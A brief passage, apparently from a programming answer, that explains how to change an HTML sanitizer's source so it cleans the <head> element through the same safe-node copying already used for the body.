      copySafeNodes(dirtyDocument.body(), clean.body());

So, if you want to clean the <head> tag instead of removing everything, get the code, modify it, and build your own package. Add the following two lines:

  if (dirtyDocument.head() != null)
      copySafeNodes(dirtyDocument.head(), clean.head());
